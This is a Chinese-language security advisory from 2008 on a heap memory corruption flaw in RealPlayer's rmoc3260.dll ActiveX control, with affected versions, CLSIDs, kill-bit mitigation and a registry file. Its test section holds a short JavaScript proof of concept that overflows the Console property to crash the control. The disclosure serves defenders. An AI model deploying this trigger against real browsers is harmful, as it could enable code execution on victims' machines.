Real Networks RealPlayer 'rmoc3260.dll' ActiveX控件内存破坏漏洞
2008-03-11 20:29
受影响版本: Real Networks rmoc3260.dll 6.0.10 45
Real Networks RealPlayer 11 |
描述:
BUGTRAQ ID: 28157
CNCAN ID:CNCAN-2008031113
Real Networks RealPlayer是一款流行的媒体播放程序。
Real Networks RealPlayer包含的'rmoc3260.dll' ActiveX控件存在内存破坏问题,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。
问题存在于'rmoc3260.dll' ActiveX控件,版本为6.0.10.4:
{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}
可能导致在释放后修改堆块,并覆盖部分寄存器,允许任意代码执行。 |
<* 参考:
http://archives.neohapsis.com/archives/fulldisclosure/2008-03/0157.html
*> |
测试方法:
[警 告]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
- ------------
var buf = '';
while (buf.length < 1005) buf = buf + 'A';
m = obj.Console;
obj.Console = buf;
obj.Console = m
//repeat
m = obj.Console;
obj.Console = buf;
obj.Console = m --> Should crash here
- ------------- |
|
建议:
目前没有官方解决方案提供:
http://www.real.com/
手动解决:
临时解决方法:
* 在IE中禁用RealPlayer ActiveX控件,为以下CLSID设置kill bit:
{0FDF6D6B-D672-463B-846E-C6FF49109662}
{224E833B-2CC6-42D9-AE39-90B6A38A4FA2}
{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
{3B46067C-FD87-49B6-8DDD-12F0D687035F}
{3B5E0503-DE28-4BE8-919C-76E0E894A3C2}
{44CCBCEB-BA7E-4C99-A078-9F683832D493}
{A1A41E11-91DB-4461-95CD-0C02327FD934}
{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}
或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0FDF6D6B-D672-463B-846E-C6FF49109662}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{224E833B-2CC6-42D9-AE39-90B6A38A4FA2}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3B46067C-FD87-49B6-8DDD-12F0D687035F}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3B5E0503-DE28-4BE8-919C-76E0E894A3C2}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{44CCBCEB-BA7E-4C99-A078-9F683832D493}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A1A41E11-91DB-4461-95CD-0C02327FD934}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}]
"Compatibility Flags"=dword:00000400
|
|
